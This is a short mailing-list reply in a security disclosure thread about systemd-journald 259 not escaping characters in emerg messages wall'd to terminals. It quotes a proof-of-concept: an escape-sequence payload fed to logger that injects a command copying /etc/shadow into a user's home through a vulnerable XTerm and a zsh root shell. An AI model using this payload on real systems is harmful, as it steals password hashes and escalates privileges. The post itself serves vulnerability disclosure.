Re: systemd-journald in systemd 259 does not escape characters in emerg messages that are wall'd to other user's terminals

[Aaron Rainbolt <arraybolt3 () riseup net>]

A minor correction:

> A more involved proof-of-concept that demonstrates how this can be
> used to escalate privileges is:
>
> 1. Compile a version of XTerm that is vulnerable to CVE-2022-45063.
>    (XTerm patch #369 worked for me last time I tried this.)
> 2. Open two instances of XTerm at once as a non-root user.
> 3. In one XTerm window, open a root shell by running `sudo -i`.

The root shell needs to be provided by ZSH, and ZSH needs to be put
into vi line editing mode, for this to work. See [1].

> 4. In the other XTerm window, as a non-root user, run
>    `pwned=$'\e]50;i$(cp /etc/shadow /home/user/shadow && chown
> user:user /home/user/shadow)\a\e]50;?\a\n'` (replacing 'user' with
> your non-root user's username where appropriate).
> 5. In the same non-root XTerm window, run
>    `logger -p 'emerg' "$pwned"`. You should now have a copy of the
>    system's shadow password file in your home directory, readable by
>    your non-root user.

[1] https://www.openwall.com/lists/oss-security/2022/11/10/1

--
Aaron

Attachment: _bin
Description: OpenPGP digital signature